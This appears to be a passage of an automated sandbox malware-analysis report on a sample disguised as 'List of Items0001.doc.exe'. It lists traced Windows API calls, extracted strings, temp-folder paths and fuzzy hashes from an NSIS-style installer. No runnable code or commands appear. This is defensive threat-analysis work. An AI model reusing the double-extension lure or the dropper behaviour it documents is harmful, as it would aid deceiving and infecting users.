                                                • Opcode Fuzzy Hash: 950969970af6d10ef62121ad67a768569704eb6391eae900e1ce4f9d1827afee
                                                • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                APIs
                                                • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404821
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404835
                                                • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                • GetSysColor.USER32(?), ref: 00404863
                                                • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                • lstrlenW.KERNEL32(?), ref: 00404884
                                                • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                • GetDlgItem.USER32(?,0000040A), ref: 004048FF
                                                • SendMessageW.USER32(00000000), ref: 00404906
                                                • GetDlgItem.USER32(?,000003E8), ref: 00404931
                                                • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                • SetCursor.USER32(00000000), ref: 00404985
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                • SetCursor.USER32(00000000), ref: 004049A1
                                                • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                • String ID: Call$N
                                                • API String ID: 3103080414-3438112850
                                                • Opcode ID: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                • Instruction ID: 690b4d321b533a2a97605fa3f7bb2423a24794fe1ec6c961d913f822d5f12d1b
                                                • Opcode Fuzzy Hash: 7b7ce6e7f04c0852b245e81234b58653da2c4cab9b10fb98097c13f3cf17b06e
                                                • Instruction Fuzzy Hash: AB6181F1900209FFDB109F61CD85A6A7B69FB84304F00813AF705B62E0C7799951DFA9
                                                APIs
                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406449,?,?), ref: 004062E9
                                                • GetShortPathNameW.KERNEL32(?,00426DE8,00000400), ref: 004062F2
                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
                                                  • Part of subcall function 004060BD: lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF
                                                • GetShortPathNameW.KERNEL32(?,004275E8,00000400), ref: 0040630F
                                                • wsprintfA.USER32 ref: 0040632D
                                                • GetFileSize.KERNEL32(00000000,00000000,004275E8,C0000000,00000004,004275E8,?,?,?,?,?), ref: 00406368
                                                • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00406377
                                                • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063AF
                                                • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,004269E8,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 00406405
                                                • GlobalFree.KERNEL32(00000000), ref: 00406416
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040641D
                                                  • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 0040615C
                                                  • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                • String ID: %ls=%ls$[Rename]$mB$uB$uB
                                                • API String ID: 2171350718-2295842750
                                                • Opcode ID: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                • Instruction ID: df9b4e9fb9d32bd4c250032a1d399944af7a2e4c2f0bdec2b7d3959d12e60cc8
                                                • Opcode Fuzzy Hash: 07ea5d3dd502240bf86d0c298f94c43ad2335bec49c481c59c36197298e6ebad
                                                • Instruction Fuzzy Hash: B8314331200315BBD2206B619D49F5B3AACEF85704F16003BFD02FA2C2EA7DD82186BD
                                                APIs
                                                • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                • BeginPaint.USER32(?,?), ref: 00401047
                                                • GetClientRect.USER32(?,?), ref: 0040105B
                                                • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                • DeleteObject.GDI32(?), ref: 004010ED
                                                • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                • SelectObject.GDI32(00000000,?), ref: 00401140
                                                • DrawTextW.USER32(00000000,00429260,000000FF,00000010,00000820), ref: 00401156
                                                • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                • DeleteObject.GDI32(?), ref: 00401165
                                                • EndPaint.USER32(?,?), ref: 0040116E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                • String ID: F
                                                • API String ID: 941294808-1304234792
                                                • Opcode ID: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                • Instruction ID: e2f9fea5dfd6f059ba8eeb08e8d10ac227d01a2162b8a260283931f50cd0bfbf
                                                • Opcode Fuzzy Hash: 8da9fae8b34351ceae2931000ebd9f39a308799c7d87b7a6dbcfe72b45b7384c
                                                • Instruction Fuzzy Hash: 33418B71800209EFCF058FA5DE459AF7BB9FF45315F00802AF991AA2A0C7349A55DFA4
                                                APIs
                                                • GetWindowLongW.USER32(?,000000EB), ref: 00404648
                                                • GetSysColor.USER32(00000000), ref: 00404686
                                                • SetTextColor.GDI32(?,00000000), ref: 00404692
                                                • SetBkMode.GDI32(?,?), ref: 0040469E
                                                • GetSysColor.USER32(?), ref: 004046B1
                                                • SetBkColor.GDI32(?,?), ref: 004046C1
                                                • DeleteObject.GDI32(?), ref: 004046DB
                                                • CreateBrushIndirect.GDI32(?), ref: 004046E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                • String ID:
                                                • API String ID: 2320649405-0
                                                • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction ID: e78b8cc9c8042372c9a7340b9b8aa9b23ded286a9f8ddc7240a2e2d8bd1f46c0
                                                • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                • Instruction Fuzzy Hash: DE2197715007049FC7309F28D908B5BBBF8AF42714F008D2EE992A22E1D739D944DB58
                                                APIs
                                                • CharNextW.USER32(?,*?|<>/":,00000000,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406952
                                                • CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406961
                                                • CharNextW.USER32(?,00000000,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406966
                                                • CharPrevW.USER32(?,?,76693420,C:\Users\user\AppData\Local\Temp\,?,0040361B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00406979
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Char$Next$Prev
                                                • String ID: *?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 589700163-1484220669
                                                • Opcode ID: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                • Instruction ID: d28fb8c2eefe6f61a155ceb01790bbf8b21f4710aa7989e54d8eeb8481a577c9
                                                • Opcode Fuzzy Hash: 4a25a2118415850d7bb15acf585ec7f7b5de772317bec8c7d00468289de3f440
                                                • Instruction Fuzzy Hash: 2611089580061295DB303B18CC40BB762F8AF99B50F12403FE98A776C1E77C4C9286BD
                                                APIs
                                                • DestroyWindow.USER32(00000000,00000000), ref: 00403049
                                                • GetTickCount.KERNEL32 ref: 00403067
                                                • wsprintfW.USER32 ref: 00403095
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                  • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                  • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,004030A8,004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000,00000000,00000000), ref: 00405725
                                                  • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00405737
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                  • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                • CreateDialogParamW.USER32(0000006F,00000000,00402F93,00000000), ref: 004030B9
                                                • ShowWindow.USER32(00000000,00000005), ref: 004030C7
                                                  • Part of subcall function 00403012: MulDiv.KERNEL32(00008000,00000064,00008198), ref: 00403027
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                • String ID: ... %d%%
                                                • API String ID: 722711167-2449383134
                                                • Opcode ID: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                • Instruction ID: 5af6bf9b0b70cf9307c1258d0e5a667b07be53d22b58a3258066d7aee54b172b
                                                • Opcode Fuzzy Hash: eb5829c7fffbc7bf65dde30d15e1f0a96a9438333430517d581b7dc81546266b
                                                • Instruction Fuzzy Hash: E8018E70553614DBC7317F60AE08A5A3EACAB00F06F54457AF841B21E9DAB84645CBAE
                                                APIs
                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404F9A
                                                • GetMessagePos.USER32 ref: 00404FA2
                                                • ScreenToClient.USER32(?,?), ref: 00404FBC
                                                • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404FCE
                                                • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404FF4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Message$Send$ClientScreen
                                                • String ID: f
                                                • API String ID: 41195575-1993550816
                                                • Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
                                                • Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
                                                • Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5
                                                APIs
                                                • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
                                                • wsprintfW.USER32 ref: 00402FE5
                                                • SetWindowTextW.USER32(?,?), ref: 00402FF5
                                                • SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Text$ItemTimerWindowwsprintf
                                                • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                • API String ID: 1451636040-1158693248
                                                • Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                • Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
                                                • Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
                                                • Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59
                                                APIs
                                                  • Part of subcall function 6DB612BB: GlobalAlloc.KERNEL32(00000040,?,6DB612DB,?,6DB6137F,00000019,6DB611CA,-000000A0), ref: 6DB612C5
                                                • GlobalFree.KERNEL32(?), ref: 6DB62743
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB62778
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                • Associated: 00000000.00000002.674065823896.000000006DB60000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.674065893260.000000006DB64000.00000002.00000001.01000000.00000005.sdmp
                                                • Associated: 00000000.00000002.674065926322.000000006DB66000.00000002.00000001.01000000.00000005.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_6db60000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                • Opcode ID: 60860c5ce65c20b4a9e25642041aab4e92275ed317506acad17f847c824978dc
                                                • Instruction ID: 39c7a048c6474790e538adf479954e00919b86c901da1ed7726e679b7b3713c5
                                                • Opcode Fuzzy Hash: 60860c5ce65c20b4a9e25642041aab4e92275ed317506acad17f847c824978dc
                                                • Instruction Fuzzy Hash: 4431AD716085C2EFEB268F64C994D3E77B6FB8B344316852DF202932A8C731AC159B75
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
                                                • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
                                                • GlobalFree.KERNEL32(?), ref: 00402A06
                                                • GlobalFree.KERNEL32(00000000), ref: 00402A19
                                                • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
                                                • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                • String ID:
                                                • API String ID: 2667972263-0
                                                • Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                • Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
                                                • Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
                                                • Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58
                                                APIs
                                                • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                                                • wsprintfW.USER32 ref: 00404F1B
                                                • SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: ItemTextlstrlenwsprintf
                                                • String ID: %u.%u%s%s$H7B
                                                • API String ID: 3540041739-107966168
                                                APIs
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB625C2
                                                  • Part of subcall function 6DB612CC: lstrcpynW.KERNEL32(00000000,?,6DB6137F,00000019,6DB611CA,-000000A0), ref: 6DB612DC
                                                • GlobalAlloc.KERNEL32(00000040), ref: 6DB62548
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6DB62563
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                Similarity
                                                • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                • String ID:
                                                • API String ID: 4216380887-0
                                                APIs
                                                • GetDlgItem.USER32(?,?), ref: 00401D9A
                                                • GetClientRect.USER32(?,?), ref: 00401DE5
                                                • LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
                                                • SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
                                                • DeleteObject.GDI32(00000000), ref: 00401E39
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                • String ID:
                                                • API String ID: 1849352358-0
                                                APIs
                                                • GetDC.USER32(?), ref: 00401E51
                                                • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
                                                • MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
                                                • ReleaseDC.USER32(?,00000000), ref: 00401E84
                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                • CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
                                                • String ID:
                                                • API String ID: 2584051700-0
                                                APIs
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6DB622D8,?,00000808), ref: 6DB616D5
                                                • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6DB622D8,?,00000808), ref: 6DB616DC
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6DB622D8,?,00000808), ref: 6DB616F0
                                                • GetProcAddress.KERNEL32(6DB622D8,00000000), ref: 6DB616F7
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB61700
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                Similarity
                                                • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                • String ID:
                                                • API String ID: 1148316912-0
                                                APIs
                                                • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: MessageSend$Timeout
                                                • String ID: !
                                                • API String ID: 1777923405-2657877971
                                                APIs
                                                • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
                                                • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
                                                • lstrcatW.KERNEL32(?,0040A014), ref: 00405F59
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CharPrevlstrcatlstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                • API String ID: 2659869361-787714339
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6DB61171
                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 6DB611E3
                                                • GlobalFree.KERNEL32 ref: 6DB6124A
                                                • GlobalFree.KERNEL32(?), ref: 6DB6129B
                                                • GlobalFree.KERNEL32(00000000), ref: 6DB612B1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674065859400.000000006DB61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6DB60000, based on PE: true
                                                Similarity
                                                • API ID: Global$Free$Alloc
                                                • String ID:
                                                • API String ID: 1780285237-0
                                                APIs
                                                • GlobalFree.KERNEL32(005EE2E0), ref: 00401C0B
                                                • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401C1D
                                                  • Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
                                                  • Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,?,00405701,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll,00000000), ref: 004068A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: Global$AllocFreelstrcatlstrlen
                                                • String ID: Call$^
                                                • API String ID: 3292104215-3393712075
                                                APIs
                                                • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00402695
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: lstrlen
                                                • String ID: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp$C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll
                                                • API String ID: 1659193697-668016552
                                                APIs
                                                • CloseHandle.KERNEL32(000002E4,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
                                                • CloseHandle.KERNEL32(000002CC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B
                                                Strings
                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
                                                • C:\Users\user\AppData\Local\Temp\nsnB66F.tmp, xrefs: 00403C5B
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Similarity
                                                • API ID: CloseHandle
                                                • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsnB66F.tmp
                                                • API String ID: 2962429428-2357032450
                                                • Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                • Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
                                                • Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
                                                • Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D
                                                APIs
                                                • IsWindowVisible.USER32(?), ref: 0040566D
                                                • CallWindowProcW.USER32(?,?,?,?), ref: 004056BE
                                                  • Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: Window$CallMessageProcSendVisible
                                                • String ID:
                                                • API String ID: 3748168415-3916222277
                                                • Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                • Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
                                                • Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
                                                • Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D
                                                APIs
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,0040679D,80000002), ref: 0040657C
                                                • RegCloseKey.ADVAPI32(?,?,0040679D,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nsnB66F.tmp\System.dll), ref: 00406587
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_List of Items0001.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue
                                                • String ID: Call
                                                • API String ID: 3356406503-1824292864
                                                • Opcode ID: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                • Instruction ID: 52dd0fe420a7c1e2827d1a164217834099ee72e945ce70567094b216899e5676
                                                • Opcode Fuzzy Hash: abb8e2472c70d4d58aecb7d0dfcf889930bd109b5a1b9baac0574de2233c5019
                                                • Instruction Fuzzy Hash: C4017C72500209FADF21CF51DD09EDB3BA8EF54364F01803AFD1AA2190D738D964DBA4
                                                APIs
                                                • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\List of Items0001.doc.exe,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 00405F89
                                                • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\List of Items0001.doc.exe,C:\Users\user\Desktop\List of Items0001.doc.exe,80000000,00000003), ref: 00405F99
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.674048032376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
